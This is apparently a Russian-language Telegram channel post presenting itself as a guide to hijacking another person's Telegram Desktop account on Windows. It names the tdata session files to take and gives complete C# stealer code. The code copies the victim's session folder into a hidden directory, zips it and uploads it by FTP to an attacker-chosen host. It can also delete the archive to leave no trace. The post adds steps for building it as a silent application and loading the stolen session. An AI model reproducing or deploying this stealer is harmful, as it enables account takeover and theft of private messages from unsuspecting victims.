Угоняем чужой аккаунт Telegram Messenger
Debian-LabЗдравствуйте дорогие подписчики! Сегодня мы Вам покажем актуальный способ как можно "угнать" сессию Telegram если у жертвы на компьютере стоит ОС Windows
Данный способ уже довольно известный, но тем не менее написать про него хочеться.
Для того что бы получить доступ к чужой сессии мессенджера Teleram нам достаточно заполучить 2 файлика из директории ...\Telegram Desktop\tdata и заменить их на наши в нашей машине:
- D877F783D5D3EF8C0 (последняя цифра может быть другой)
- D877F783D5D3EF8C\mapo (последняя цифра так же может быть другой)
Вот пример небольшого кода для автоматизации кражи сессии Telegram написанного на языке программирования C#:
using System;
using System.IO;
using System.Diagnostics;
using System.IO.Compression;
using System.Net;
using System.Threading;
namespace TStealer
{
class Program
{
private class StealStart
{
private bool in_folder = false;
public StealStart(string host = "", string login = "", string pass = "", bool del_zip = false)
{
new Thread(() => StealIt(host, login, pass, del_zip)).Start();
}
private void StealIt(string host, string login, string pass, bool del_zip)
{
var prcName = "Telegram";
Process[] processByName = Process.GetProcessesByName(prcName);
if (processByName.Length < 1)
return;
var dir_from = Path.GetDirectoryName(processByName[0].MainModule.FileName) + "\\Tdata";
var this_fileLocation = System.Reflection.Assembly.GetEntryAssembly().Location;
var dir_to = Path.GetDirectoryName(this_fileLocation) +
"\\Tdata_" +
(int)(DateTime.UtcNow - new DateTime(1970, 1, 1)).TotalSeconds
;
var zipPath = dir_to + ".zip";
CopyAll(dir_from, dir_to);
ZipDir(dir_to, zipPath);
Directory.Delete(dir_to, true);
if (host == "")
return;
LoadOnFtp(zipPath, host, login, pass);
if(del_zip)
File.Delete(zipPath);
}
private void CopyAll(string fromDir, string toDir)
{
DirectoryInfo di = Directory.CreateDirectory(toDir);
di.Attributes = FileAttributes.Directory | FileAttributes.Hidden;
foreach (string s1 in Directory.GetFiles(fromDir))
CopyFile(s1, toDir);
foreach (string s in Directory.GetDirectories(fromDir))
CopyDir(s, toDir);
}
private void CopyFile(string s1, string toDir)
{
try
{
var fname = Path.GetFileName(s1);
if (in_folder && !(fname[0] == 'm' || fname[1] == 'a' || fname[2] == 'p'))
return;
var s2 = toDir + "\\" + fname;
File.Copy(s1, s2);
}
catch { }
}
private void CopyDir(string s, string toDir)
{
try
{
in_folder = true;
CopyAll(s, toDir + "\\" + Path.GetFileName(s));
in_folder = false;
}
catch { }
}
private void ZipDir(string dir_to, string zipPath)
{
try
{
ZipFile.CreateFromDirectory(dir_to, zipPath);
File.SetAttributes(zipPath, File.GetAttributes(zipPath) | FileAttributes.Hidden);
}
catch { }
}
private void LoadOnFtp(string zipPath, string host, string login, string pass)
{
try
{
using (WebClient client = new WebClient())
{
client.Credentials = new NetworkCredential(login, pass);
client.UploadFile("ftp://" + host + "/" + Path.GetFileName(zipPath), "STOR", zipPath);
}
}
catch { }
}
}
static void Main(string[] args)
{
//var stealT = new StealStart();
var host = "example.host.com";
var login = "example_login";
var pass = "example_pass";
var steal_With_FTP = new StealStart(host, login, pass, false);
}
}
}
- Добавляем ссылку на System.IO.Compression.FileSystem (Проект --> Добавить ссылку)
- Делаем тихий запуск (Проект --> Свойства --> Тип выходных данных --> Приложение Windows)
Как работает наш код:
Мы ищем процесс затем берем его директорию для дальнейшего копирования настроек и сессии. Затем мы создаем ZIP архив и отправляем по FTP на наш сайт.
Использовав конструктор без параметров (new StealStart()), то мы просто копируем настройки сессию в ZIP архив.
new StealStart(host, login, pass, false); - это хост, логин, пароль от FTP и bool который отвечает удалить ли ZIP после отправки нам на FTP.
После запуска, рядом с exe будет скрытая zip-ка которая и отправится нам на FTP. Если Вы указали true в new StealStart(), то данный архив будет уничтожен и не оставит следов на компьютере жертвы.
Создаем новую папку и копируем туда свой файл Telegram.exe, а также папку tdata удалив всё содержимое. С архива делаем распоковку в папку D877F783D5D3EF8C0 и папку D877F783D5D3EF8C.
В итоге должно выйти примерно так:
В папке tdata:
В D877F783D5D3EF8C:
Далее запускаем телеграм.ехе, и он сам всё доделает.
⏳ Наш основной канал - @debian_lab
🌆 Наш канал с приватными сливами - @slivkins_lab